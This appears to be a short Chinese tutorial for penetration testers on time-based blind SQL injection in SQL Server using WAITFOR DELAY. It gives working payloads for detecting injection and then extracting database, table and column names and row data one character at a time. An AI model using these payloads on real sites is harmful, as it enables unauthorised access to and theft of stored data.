延時函式WAITFOR DELAY

WAITFOR是SQL Server中Transact-SQL提供的一個流程控制語句。它的作用就是等待特定時間，然後繼續執行後續的語句。它包含一個引數DELAY，用來指定等待的時間。如果將該語句成功注入後，會造成資料庫返回記錄和Web請求也會響應延遲特定的時間。由於該語句不涉及條件判斷等情況，所以容易注入成功。根據Web請求是否有延遲，滲透測試人員就可以判斷網站是否存在注入漏洞。同時，由於該語句並不返回特定內容，所以它也是盲注的重要檢測方法。

語法：

WAITFOR DELAY '0:0:n'

示例：

WAITFOR DELAY '0:0:4' -- 表示延遲4秒

IF exists()字句

語法：

IF exists () WAITFOR DELAY '0:0:5'

注入流程：

1.判斷是否存在注入

WAITFOR DELAY ‘0:0:4’

2.猜解資料庫名稱

IF exists (select top 1 name from Master..SysDatabases where unicode(substring(name,1,1))=109) WAITFOR DELAY '0:0:5'--

3.猜解表名

IF exists (select top 1 table_name from information_schema.columns where unicode(substring(table_name,1,1))=109) WAITFOR DELAY '0:0:5'--

4.猜解列名

IF exists (select top 1 name from syscolumns where id =(select id from sysobjects where name = '表名') and unicode(substring(name,1,1))=117) WAITFOR DELAY '0:0:5'--

5.逐字猜解資料

IF exists (select id from 表名 where unicode(substring(列名1,1,1))=97 and ID=1) WAITFOR DELAY '0:0:5'--

IF exists (select id from 表名 where unicode(substring(列名2,1,1))=55 and ID=1) WAITFOR DELAY '0:0:5'--